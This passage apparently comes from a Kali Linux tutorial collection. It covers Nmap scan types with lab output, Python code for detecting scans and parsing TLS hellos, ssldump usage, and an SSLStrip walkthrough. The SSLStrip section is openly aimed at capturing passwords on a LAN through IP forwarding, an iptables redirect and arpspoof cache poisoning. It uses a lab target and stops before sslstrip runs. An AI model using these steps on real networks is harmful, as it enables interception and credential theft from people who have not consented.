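def detect_scans(packets: List[Packet], port_threshold: int = 10) -> List[Dict]:
    """Group traffic by (src, dst); alert when a source sends malformed probe
    types or touches at least `port_threshold` distinct ports on one host."""
    tracks = defaultdict(lambda: {"ports": set(), "kinds": set()})
    for _ts, src, dst, dport, flags in packets:
        track = tracks[(src, dst)]
        track["ports"].add(dport)
        track["kinds"].add(classify_flags(flags))
    alerts = []
    for (src, dst), track in tracks.items():
        if track["kinds"] & MALFORMED or len(track["ports"]) >= port_threshold:
            alerts.append({"src": src, "dst": dst,
                           "ports": len(track["ports"]),
                           "kinds": sorted(track["kinds"])})
    return alerts


if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_PACKETS):
        print(alert)
```

The constructed traffic yields one alert, for 192.168.237.128, and none for the client that opened two services with ordinary SYNs. Note that the bare ACK case is ambiguous by design: an ACK scan (-sA) looks like established traffic segment by segment, so it can only be spotted by the port-count rule. The "all closed" results in Figure 10 are also worth reading with care: Windows replies with RST to these probes regardless of port state, so on that target the scans say nothing about which ports are open, and a detector should not assume a Null or FIN probe was aimed at a closed port just because it drew a RST.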
Step 8.

UDP scan - scan a host for UDP services. This scan is used to view open UDP ports (Figure 11).

Example - nmap -sU 192.168.237.129

root@MrQuiety:~# nmap -sU 192.168.237.129
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:17 IST
Nmap scan report for 192.168.237.129
Host is up (0.0035s latency).
Not shown: 993 closed ports
PORT     STATE         SERVICE
123/udp  open          ntp
137/udp  open          netbios-ns
138/udp  open|filtered netbios-dgm
445/udp  open|filtered microsoft-ds
500/udp  open|filtered isakmp
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.03 seconds

Figure 11. UDP scan

Step 9.

Scan for IP protocols - this type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by the target machines (Figure 12).

Example - nmap -sO 192.168.237.129

root@MrQuiety:~# nmap -sO 192.168.237.129
Nmap scan report for 192.168.237.129
Host is up (0.00064s latency).
Not shown: 252 open|filtered protocols
PROTOCOL STATE  SERVICE
1        open   icmp
6        open   tcp
17       open   udp
132      closed sctp
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.41 seconds

Figure 12. Scan for IP protocol

Step 10.

Detect remote services (server/domain) version numbers (Figure 13).

Example - nmap -sV 192.168.237.129

root@MrQuiety:~# nmap -sV 192.168.237.129
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:19 IST
Nmap scan report for 192.168.237.129
Host is up (0.0014s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up)

Figure 13. Detecting remote services

Step 11.

Find out the most commonly used TCP ports using a TCP SYN scan.

A. Stealthy scan (Figure 14).

Example - nmap -sS 192.168.237.129

root@MrQuiety:~# nmap -sS 192.168.237.129
Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:20 IST
Nmap scan report for 192.168.237.129
Host is up (0.0011s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.61 seconds

Figure 14. Stealthy TCP SYN scan

B. TCP connect scan (-sT). Same port list, but Nmap uses the operating system's connect() call and completes the three-way handshake on every open port. It needs no raw-socket privilege, which is why it is the default for an unprivileged user, and the full connection shows up in the target's service logs (Figure 15).

Example - nmap -sT 192.168.237.129

root@MrQuiety:~# nmap -sT 192.168.237.129

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:21 IST
Nmap scan report for 192.168.237.129
Host is up (0.0035s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
MAC Address: 00:0C:29:B0:E3:F3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.64 seconds
root@MrQuiety:~#

Figure 15. TCP connect scan






C. TCP ACK scan (-sA). Unlike the two scans above, an ACK scan cannot tell open from closed: a bare ACK sent to any unfiltered port, open or not, gets a RST back. Nmap therefore reports only unfiltered (a RST came back) or filtered (nothing, or an ICMP unreachable), which makes this a way to map firewall rules rather than to find services. "All 1000 scanned ports are unfiltered" here means nothing between Kali and the XP box is filtering TCP, which agrees with the 996 closed ports the SYN scan reported (Figure 16).

Example - nmap -sA 192.168.237.129

root@MrQuiety:~# nmap -sA 192.168.237.129

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:22 IST
Nmap scan report for 192.168.237.129
Host is up (0.0019s latency).
All 1000 scanned ports on 192.168.237.129 are unfiltered
MAC Address: 00:0C:29:B0:E3:F3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.65 seconds
root@MrQuiety:~#

Figure 16. TCP ACK scan
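To make the SYN/ACK distinction concrete, here is an added example (my own code, not from the article or from Nmap): a small Python parser for Nmap's normal output that merges a SYN scan and an ACK scan of the same host into one verdict per port, following the state semantics of the Nmap reference guide. The two captures it works on are constructed: the first pair mirrors Figures 14 and 16, the second pair is a hypothetical host (10.0.0.5) behind a stateless packet filter. The port list and the verdict strings are my own.

```python
import re

# The three line shapes that carry port state in Nmap's normal output.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
NOT_SHOWN = re.compile(
    r"^Not shown: (\d+) (open\|filtered|closed\|filtered|closed|filtered|unfiltered) ports")
ALL_PORTS = re.compile(r"^All (\d+) scanned ports on \S+ are (\S+)")


def parse_nmap(text):
    """Parse one host's normal-format Nmap output.

    Returns {'ports': {(port, proto): state}, 'default': state}, where
    'default' is the state Nmap summarised away ("Not shown: 996 closed
    ports" or "All 1000 scanned ports ... are unfiltered").
    """
    scan = {"ports": {}, "default": None}
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_LINE.match(line)
        if m:
            scan["ports"][(int(m.group(1)), m.group(2))] = m.group(3)
            continue
        m = NOT_SHOWN.match(line) or ALL_PORTS.match(line)
        if m:
            scan["default"] = m.group(2)
    return scan


def state_of(scan, port, proto="tcp"):
    """State of a port, falling back to the summarised default."""
    return scan["ports"].get((port, proto), scan["default"])


def combine(syn, ack, ports):
    """Merge SYN (-sS) and ACK (-sA) results per port.

    SYN scan: open / closed / filtered.  ACK scan: unfiltered (a RST came
    back) / filtered (nothing came back).  Read together they say not only
    whether a port is open but what kind of filtering sits in front of it.
    """
    verdicts = {}
    for port in ports:
        s, a = state_of(syn, port), state_of(ack, port)
        if s == "open":
            verdicts[port] = "open"
        elif s == "closed" and a == "unfiltered":
            verdicts[port] = "closed, reachable (no filtering)"
        elif s == "filtered" and a == "unfiltered":
            verdicts[port] = "stateless filter: SYN dropped, bare ACK passes"
        elif s == "filtered" and a == "filtered":
            verdicts[port] = "filtered both ways (stateful firewall or drop-all)"
        else:
            verdicts[port] = f"inconclusive (syn={s}, ack={a})"
    return verdicts


# Constructed captures (sample text, not real scan output).  SYN_XP/ACK_XP
# mirror the article's XP target; SYN_FW/ACK_FW model a hypothetical host
# behind a stateless packet filter that only lets port 80 through.
SYN_XP = """\
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
"""
ACK_XP = "All 1000 scanned ports on 192.168.237.129 are unfiltered\n"

SYN_FW = """\
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http
"""
ACK_FW = "All 1000 scanned ports on 10.0.0.5 are unfiltered\n"


def example():
    """Merge both pairs; returns (xp_verdicts, firewalled_verdicts)."""
    ports = [80, 135, 139, 445, 3389]
    xp = combine(parse_nmap(SYN_XP), parse_nmap(ACK_XP), ports)
    fw = combine(parse_nmap(SYN_FW), parse_nmap(ACK_FW), ports)
    return xp, fw


if __name__ == "__main__":
    for label, verdicts in zip(("xp", "firewalled"), example()):
        for port, verdict in verdicts.items():
            print(f"{label:10} {port:>5}/tcp  {verdict}")
```

Run the two scans against the same host with -oN, feed each file to parse_nmap, and combine the results; the "stateless filter" verdict is the one that tells you a SYN-only ruleset can be probed with ACK packets, which a stateful firewall would drop.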

D. TCP Window scan (-sW). This is the ACK scan with one extra heuristic: on some systems the TCP window field of the RST is positive for open ports and zero for closed ones. Windows is not one of those systems, so every port comes back "closed" here even though the SYN scan just showed four of them open. Treat an all-closed Window scan as "no information", not as a result (Figure 17).

Example - nmap -sW 192.168.237.129

root@MrQuiety:~# nmap -sW 192.168.237.129

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:23 IST
Nmap scan report for 192.168.237.129
Host is up (0.0020s latency).
All 1000 scanned ports on 192.168.237.129 are closed
MAC Address: 00:0C:29:B0:E3:F3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.50 seconds
root@MrQuiety:~#

Figure 17. TCP Window scan

E. TCP Maimon scan (-sM). The probe is FIN/ACK. RFC 793 says a RST should come back whether the port is open or closed, but many BSD-derived stacks silently drop the probe when the port is open, and that is what the scan keys on. Windows answers every FIN/ACK with a RST, so, as with the Window scan, "all 1000 scanned ports closed" against this XP target says nothing about the ports (Figure 18).

Example - nmap -sM 192.168.237.129

root@MrQuiety:~# nmap -sM 192.168.237.129

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:23 IST
Nmap scan report for 192.168.237.129
Host is up (0.0026s latency).
All 1000 scanned ports on 192.168.237.129 are closed
MAC Address: 00:0C:29:B0:E3:F3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.58 seconds
root@MrQuiety:~#

Figure 18. TCP Maimon scan



Step 12.

List scan (-sL). Nmap only lists the targets the expression expands to and does a reverse-DNS lookup on each; it sends no packets to the targets, which is why the summary reports 0 hosts up. Use it to check what a range or hostname actually expands to before you launch a scan against it (Figure 19).

Example - nmap -sL 192.168.237.129

root@MrQuiety:~# nmap -sL 192.168.237.129

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:24 IST
Nmap scan report for 192.168.237.129
Nmap done: 1 IP address (0 hosts up) scanned in 0.33 seconds
root@MrQuiety:~#

Figure 19. List scan



Step 13.

Host discovery, or ping scan (-sP; in current Nmap the option is spelled -sn and -sP is kept as an alias). Nmap skips the port scan and only reports which addresses in the range answer its discovery probes. On a local Ethernet segment, as here, discovery is done with ARP requests, so even hosts that drop ICMP show up, and the MAC address tells you the vendor (all VMware here). 192.168.237.128 is the Kali machine itself, which is why it is listed without a latency or MAC line (Figure 20).

Example - nmap -sP 192.168.237.0/24

root@MrQuiety:~# nmap -sP 192.168.237.0/24

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:25 IST
Nmap scan report for 192.168.237.1
Host is up (0.0047s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.237.2
Host is up (0.00029s latency).
MAC Address: 00:50:56:ED:D4:DE (VMware)
Nmap scan report for 192.168.237.128
Host is up.
Nmap scan report for 192.168.237.129
Host is up (0.00053s latency).
MAC Address: 00:0C:29:B0:E3:F3 (VMware)
Nmap scan report for 192.168.237.254
Host is up (0.00024s latency).
MAC Address: 00:50:56:F7:8B:F4 (VMware)
Nmap done: 256 IP addresses (5 hosts up) scanned in 8.78 seconds
root@MrQuiety:~#

Figure 20. Ping scan



Step 14.

Scan a host that does not answer discovery probes, typically because a host firewall drops them (-PN; spelled -Pn in current Nmap, with -PN kept as an alias). Without it Nmap would report such a host as down and skip the port scan; with it, Nmap treats every target as up and scans regardless. The target here is 192.168.237.1, the host-side VMware adapter: it answers ARP (so the host is up) but its firewall drops every TCP probe, so all 1000 ports come back filtered and the scan takes far longer, because every port has to time out (Figure 21).

Example - nmap -PN 192.168.237.1

root@MrQuiety:~# nmap -PN 192.168.237.1

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-01 19:26 IST
Nmap scan report for 192.168.237.1
Host is up (0.0011s latency).
All 1000 scanned ports on 192.168.237.1 are filtered
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 23.91 seconds
root@MrQuiety:~#

Figure 21. Scanning a host while protected by firewall
How to Use Ssldump in Kali Linux

by Rrajesh Kumar 

Ssldump is an SSL/TLS network protocol analyzer. It identifies TCP connections on the 
chosen network interface and attempts to interpret them as SSL/TLS traffic. When it identifies 
SSL/TLS traffic, it decodes the records and displays them in a textual form to stdout. If 
provided with the appropriate keying material, it will also decrypt the connections and 
display the application data traffic (www.rtfm.com). 



Step 1. How to open

A. GUI Method (Figure 1).

Applications → Kali Linux → Information Gathering → SSL Analysis → ssldump

Figure 1. Opening ssldump in the GUI

B. Open the terminal and type ssldump -h. This prints the usage line with all of ssldump's options (Figure 2).

root@MrQuiety:~# ssldump -h
Usage: ssldump [-vtaTnsAxVNde] [-r dumpfile] [-i interface] [-k keyfile] [-p password] [filter]
root@MrQuiety:~#

Figure 2. Opening ssldump in the terminal
Step 2.

Capture and list the TCP connections on an interface (Figure 3). The filter at the end is ordinary pcap (tcpdump) syntax. With port 80 ssldump only sees plain-HTTP connections; since they carry no TLS records it prints nothing but the connection summaries and the TCP events, which still shows how the tool numbers connections and labels directions.

Syntax - ssldump -i interface port <port>
Example - ssldump -i eth0 port 80

root@MrQuiety:~# ssldump -i eth0 port 80
New TCP connection #1: 192.168.237.128(33668) <-> bouncer01.zlb.phx.mozilla.net(80)
New TCP connection #2: 192.168.237.128(57839) <-> bouncer01.zlb.phx.mozilla.net(80)
New TCP connection #3: 192.168.237.128(56066) <-> 124.124.201.1(80)
3  3.0100 (3.0100)  C>S  TCP
3  4.5990 (0.7889)  S>C  TCP
[...]
New TCP connection #5: 192.168.237.128(55796) <-> OCSP.AMS1.VERISIGN.COM(80)
New TCP connection #6: 192.168.237.128(55795) <-> OCSP.AMS1.VERISIGN.COM(80)
[...]

To reproduce the figure: first run the command in a terminal, then open www.google.co.in in the browser. In the output, C>S marks records sent from the client to the server and S>C records sent from the server to the client; the number at the start of each line is the connection the record belongs to.

Figure 3. Showing the traffic



Step 3.

Decode application data (-d). Normally ssldump can only show application data once it has decrypted it, which needs the server's private key (-k). With -d it also decodes whatever plaintext is on the connection before any TLS handshake starts, so you can see an HTTPS CONNECT through a proxy or the SMTP dialogue that precedes STARTTLS. A side effect is that ssldump cannot tell "plaintext before TLS" from "a TCP connection that never uses TLS at all", which turns -d into a general-purpose TCP sniffer: on port 80 it prints the complete HTTP request.

Ssldump automatically detects ASCII data and prints it as text; anything else is shown as a hex dump (Figures 4 and 5).

Syntax - ssldump -d -i interface port <port>
Example - ssldump -d -i eth0 port 80

root@MrQuiety:~# ssldump -d -i eth0 port 80
New TCP connection #1: 192.168.237.128(36369) <-> ni-in-f94.1e100.net(80)
1 0.1003 (0.1003)  C>S
GET / HTTP/1.1
Host: www.google.co.in
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PREF=...; NID=...
Connection: keep-alive

Figure 4. Application data traffic
Figure 5. Non-ASCII application data traffic (hex dumps)



Step 4.

Print absolute timestamps instead of relative ones (-e). Each record line then starts with seconds since the Unix epoch, with the time since the previous record still shown in parentheses; this is what you want when correlating a capture with server logs (Figure 6).

Example - ssldump -e -i eth0 port 80

root@MrQuiety:~# ssldump -e -i eth0 port 80
New TCP connection #1: 192.168.237.128(36377) <-> ni-in-f94.1e100.net(80)
1 1385967620.2971 (116.1882)  C>S  TCP FIN
1 1385967620.4605 (0.1713)  S>C  TCP FIN

Figure 6. Absolute timestamps



Step 5.

Print the full SSL record header (-H). Every line then shows the connection number, record number, timestamp and direction, followed by the record type. For handshake records ssldump also prints the handshake message type (ClientHello, ServerHello, Certificate and so on) and decodes the fields that have proven most useful for debugging:

ClientHello - protocol version, offered cipher suites, session ID (Figure 7).

ServerHello - protocol version, session_id, the cipher suite the server chose, compression method (Figure 8).

Example - ssldump -H -i eth0 port 443 (then open https://www.facebook.com in the browser)

root@MrQuiety:~# ssldump -H -i eth0 port 443
New TCP connection #1: 192.168.237.128(35477) <-> edge-star-s[...].com(443)
1 1  0.2762 (0.2762)  C>S  Handshake
      ClientHello
        Version 3.1
        cipher suites
        Unknown value 0xff
        Unknown value 0xc00a
        Unknown value 0xc014
        Unknown value 0x88
        Unknown value 0x87
        TLS_DHE_RSA_WITH_AES_256_CBC_SHA
        TLS_DHE_DSS_WITH_AES_256_CBC_SHA
        Unknown value 0xc00f
        Unknown value 0xc005
        Unknown value 0x84
        TLS_RSA_WITH_AES_256_CBC_SHA
        Unknown value 0xc007
        Unknown value 0xc009
        [...]
        TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
        TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA
        Unknown value 0xc00d
        Unknown value 0xc003
        Unknown value 0xfeff
        TLS_RSA_WITH_3DES_EDE_CBC_SHA
        compression methods
                  NULL
1 2  0.8254 (0.5492)  S>C  Handshake
      ServerHello
        Version 3.1
        session_id[0]=
        cipherSuite         Unknown value 0xc011
        compressionMethod                   NULL
1 3  0.8651 (0.0397)  S>C  Handshake
      Certificate
1 4  0.8651 (0.0000)  S>C  Handshake
      ServerKeyExchange
1 5  0.8651 (0.0000)  S>C  Handshake
      ServerHelloDone
1 6  0.9094 (0.0443)  C>S  Handshake
      ClientKeyExchange
1 7  0.9094 (0.0000)  C>S  ChangeCipherSpec

Figure 7. ClientHello

Figure 8. ServerHello

Two things to read off this exchange. "Version 3.1" is TLS 1.0 (SSL 3.0 is 3.0, TLS 1.1 is 3.2 and TLS 1.2 is 3.3). And the "Unknown value" entries are not capture errors: the ssldump release Kali packages (0.9b3) predates the elliptic-curve and Camellia cipher suites, so it cannot name them. The suite the server actually picked, 0xc011, is TLS_ECDHE_RSA_WITH_RC4_128_SHA, and 0xff is TLS_EMPTY_RENEGOTIATION_INFO_SCSV, a signalling value rather than a cipher. When you audit a server's configuration, the ServerHello line is the one that matters, because that suite is what protects the session.
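To see what ssldump is decoding when it prints those ClientHello and ServerHello lines, here is an added example (my own code, not ssldump's) that builds a TLS 1.0 handshake record, parses it back field by field, and names the cipher suites, including the ECC, Camellia and FIPS code points that ssldump 0.9b3 prints as "Unknown value". The builder functions exist only so the parser has bytes to work on offline; the suite table covers the values in Figures 7 and 8, and a real capture may of course contain others.

```python
import struct

# Cipher-suite code points seen in the article's capture (IANA registry names).
# Those ssldump 0.9b3 printed as "Unknown value" postdate that release.
SUITES = {
    0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
    0x0013: "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA",
    0x0016: "TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA",
    0x0035: "TLS_RSA_WITH_AES_256_CBC_SHA",
    0x0038: "TLS_DHE_DSS_WITH_AES_256_CBC_SHA",
    0x0039: "TLS_DHE_RSA_WITH_AES_256_CBC_SHA",
    0x0084: "TLS_RSA_WITH_CAMELLIA_256_CBC_SHA",
    0x0087: "TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA",
    0x0088: "TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA",
    0x00FF: "TLS_EMPTY_RENEGOTIATION_INFO_SCSV",
    0xC003: "TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA",
    0xC005: "TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA",
    0xC007: "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA",
    0xC009: "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA",
    0xC00A: "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA",
    0xC00D: "TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA",
    0xC00F: "TLS_ECDH_RSA_WITH_AES_256_CBC_SHA",
    0xC011: "TLS_ECDHE_RSA_WITH_RC4_128_SHA",
    0xC014: "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA",
    0xFEFF: "SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA",
}
VERSIONS = {(3, 0): "SSL 3.0", (3, 1): "TLS 1.0", (3, 2): "TLS 1.1", (3, 3): "TLS 1.2"}
HANDSHAKE, CLIENT_HELLO, SERVER_HELLO = 22, 1, 2   # record type, handshake types


def suite_name(code):
    return SUITES.get(code, f"Unknown value 0x{code:x}")


def weak_reasons(code):
    """Why an auditor would flag this suite (empty list: nothing obvious)."""
    name = suite_name(code)
    flags = (("RC4", "RC4 keystream biases"), ("3DES", "64-bit block cipher"),
             ("TLS_RSA_", "no forward secrecy"))
    return [reason for flag, reason in flags if flag in name]


def _record(htype, body, version):
    """Wrap a handshake body in a 4-byte handshake header and a 5-byte TLS record header."""
    handshake = bytes([htype]) + len(body).to_bytes(3, "big") + body
    return struct.pack("!BBBH", HANDSHAKE, version[0], version[1], len(handshake)) + handshake


def build_client_hello(version, suites, session_id=b"", random=bytes(32)):
    body = bytes(version) + random + bytes([len(session_id)]) + session_id
    body += struct.pack("!H", 2 * len(suites)) + b"".join(struct.pack("!H", s) for s in suites)
    body += bytes([1, 0])                                   # one compression method: NULL
    return _record(CLIENT_HELLO, body, version)


def build_server_hello(version, suite, session_id=b"", random=bytes(32)):
    body = bytes(version) + random + bytes([len(session_id)]) + session_id
    body += struct.pack("!H", suite) + bytes([0])          # chosen suite, NULL compression
    return _record(SERVER_HELLO, body, version)


def parse_hello(data):
    """Parse one handshake record holding a ClientHello or ServerHello."""
    ctype, major, minor, length = struct.unpack("!BBBH", data[:5])
    if ctype != HANDSHAKE:
        raise ValueError(f"record type {ctype} is not Handshake")
    body = data[5:5 + length]
    if len(body) != length:
        raise ValueError("truncated record")
    htype = body[0]
    hlen = int.from_bytes(body[1:4], "big")
    msg = body[4:4 + hlen]
    version = struct.unpack("!BB", msg[:2])
    pos = 2 + 32                                             # skip the 32-byte Random
    sid_len = msg[pos]
    pos += 1
    out = {"record_version": (major, minor), "version": VERSIONS.get(version, str(version)),
           "session_id": msg[pos:pos + sid_len].hex()}
    pos += sid_len
    if htype == CLIENT_HELLO:
        cs_len = struct.unpack("!H", msg[pos:pos + 2])[0]
        pos += 2
        suites = [struct.unpack("!H", msg[i:i + 2])[0] for i in range(pos, pos + cs_len, 2)]
        pos += cs_len
        comp_len = msg[pos]
        out.update(type="ClientHello", cipher_suites=suites,
                   compression_methods=list(msg[pos + 1:pos + 1 + comp_len]))
    elif htype == SERVER_HELLO:
        suite = struct.unpack("!H", msg[pos:pos + 2])[0]
        out.update(type="ServerHello", cipher_suite=suite, compression_method=msg[pos + 2])
    else:
        raise ValueError(f"handshake type {htype} not handled")
    return out


# Constructed exchange mirroring Figures 7 and 8: the client offers the list
# ssldump printed, the server picks 0xc011.  Not a real capture.
OFFERED = [0x00FF, 0xC00A, 0xC014, 0x0088, 0x0087, 0x0039, 0x0038, 0xC00F, 0xC005,
           0x0084, 0x0035, 0xC007, 0xC009, 0x0016, 0x0013, 0xC00D, 0xC003, 0xFEFF, 0x000A]


def example():
    """Build, parse and assess the exchange; returns (client, server, reasons)."""
    client = parse_hello(build_client_hello((3, 1), OFFERED))
    server = parse_hello(build_server_hello((3, 1), 0xC011))
    return client, server, weak_reasons(server["cipher_suite"])
```

Pointing parse_hello at the first record of a real capture (pcap bytes after the TCP payload offset) gives the same fields ssldump prints, with every suite named; the weak_reasons line is the audit verdict the article's capture deserves, since the server settled on RC4.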
How to Use SSLStrip in Kali Linux

by Rrajesh Kumar 

In this tutorial we use sslstrip to capture passwords from a PC on the same LAN. SSLStrip sits in the middle of the victim's HTTP traffic and rewrites every https:// link and redirect it sees into http://, so the victim's browser talks plaintext to the attacker while sslstrip talks TLS to the real site and relays the answers; a login form that should have been submitted over HTTPS then arrives at the attacker in the clear. The attack only works while the victim's first request to a site is plain HTTP. A site that sends HTTP Strict-Transport-Security, to a browser that has already seen the header or has the site on its preload list, never issues that first plaintext request, which is why stealing passwords from some websites has become difficult.

Step 1. How to open

A. GUI Method (Figure 1).

Applications → Kali Linux → Information Gathering → SSL Analysis → sslstrip

Figure 1. Opening SSLStrip in the GUI

B. Open the terminal and type sslstrip -h. This prints SSLStrip's help with all options (Figure 2).

root@MrQuiety:~# sslstrip -h

sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename>   Specify file to log to (optional).
-p , --post                         Log only SSL POSTs. (default)
-s , --ssl                          Log all SSL traffic to and from server.
-a , --all                          Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>          Port to listen on (default 10000).
-f , --favicon                      Substitute a lock favicon on secure requests.
-k , --killsessions                 Kill sessions in progress.
-h                                  Print this help message.

root@MrQuiety:~#

Figure 2. Opening SSLStrip in the terminal
Before starting SSLStrip we need to build the traffic path that puts Kali between the target and its gateway:

• Enable IP forwarding, so packets the target sends to the gateway (and the replies) are passed on instead of dropped

• Add an iptables rule that redirects forwarded port 80 traffic to the port sslstrip listens on (8080)

• Find the gateway IP

• Find the target IP

• Poison both ARP caches with arpspoof

Step 2.

Enable IP forwarding (Figure 3). Without it the poisoned target loses all connectivity the moment arpspoof starts, which is the quickest way to get noticed. The setting lasts until reboot.

Syntax - echo '1' > /proc/sys/net/ipv4/ip_forward

root@MrQuiety:~# echo '1' > /proc/sys/net/ipv4/ip_forward
root@MrQuiety:~#

Figure 3. IP forwarding

Step 3.

Add a NAT rule so that HTTP traffic the target sends through us (destination port 80, arriving in the PREROUTING chain because it is being forwarded rather than addressed to Kali) is redirected to local port 8080, where sslstrip will listen (Figure 4). Without this rule the forwarded traffic would simply be routed on to the real gateway and sslstrip would never see it.

Syntax - iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

root@MrQuiety:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
root@MrQuiety:~#

Figure 4. Redirecting requests from port 80 to port 8080



Step 4.

Find the gateway IP (Figure 5). The default route (destination 0.0.0.0, flag G) names it: 192.168.237.2, reached through eth0.

Syntax - netstat -nr

root@MrQuiety:~# netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         192.168.237.2   0.0.0.0         UG        0 0          0 eth0
192.168.237.0   0.0.0.0         255.255.255.0   U         0 0          0 eth0

Figure 5. Finding gateway IP
Step 5.

Find the target IP (Figure 6). Here we simply run ipconfig on the target, a Windows XP machine, and read off 192.168.237.129. On a LAN where you have no console access, host discovery does the same job: the nmap -sP sweep earlier in this issue lists every live address on 192.168.237.0/24 with its MAC vendor, and a little social engineering fills in which machine belongs to whom. Note the target IP.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Nbtscan Test>ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.237.129

Figure 6. Getting target IP



Step 6.

Poison the ARP caches with arpspoof so that the target's traffic flows through Kali (Figure 7). -t names the target and -r makes the poisoning bidirectional: arpspoof keeps telling the target that the gateway's IP is at Kali's MAC, and telling the gateway that the target's IP is at Kali's MAC. Every packet between the two now crosses our interface, which is why IP forwarding had to be enabled first.

Syntax - arpspoof -i interface -t targetIP -r gatewayIP
Example - arpspoof -i eth0 -t 192.168.237.129 -r 192.168.237.2

root@MrQuiety:~# arpspoof -i eth0 -t 192.168.237.129 -r 192.168.237.2
0:c:29:fe:1e:c0 0:c:29:b0:e3:f3 0806 42: arp reply 192.168.237.2 is-at 0:c:29:fe:1e:c0
0:c:29:fe:1e:c0 0:50:56:ed:d4:de 0806 42: arp reply 192.168.237.129 is-at 0:c:29:fe:1e:c0
0:c:29:fe:1e:c0 0:c:29:b0:e3:f3 0806 42: arp reply 192.168.237.2 is-at 0:c:29:fe:1e:c0
0:c:29:fe:1e:c0 0:50:56:ed:d4:de 0806 42: arp reply 192.168.237.129 is-at 0:c:29:fe:1e:c0
0:c:29:fe:1e:c0 0:c:29:b0:e3:f3 0806 42: arp reply 192.168.237.2 is-at 0:c:29:fe:1e:c0
0:c:29:fe:1e:c0 0:50:56:ed:d4:de 0806 42: arp reply 192.168.237.129 is-at 0:c:29:fe:1e:c0

Each line is one forged reply: source MAC (Kali's, 0:c:29:fe:1e:c0), destination MAC, EtherType 0806 (ARP), frame length, then the claim being made. The destination MACs are the ones the nmap ping scan reported for the target (00:0C:29:B0:E3:F3) and the gateway (00:50:56:ED:D4:DE). arpspoof repeats these replies every couple of seconds until it is stopped, and on exit sends corrective replies carrying the real MACs.

Figure 7. Redirecting all network HTTP traffic through our computer
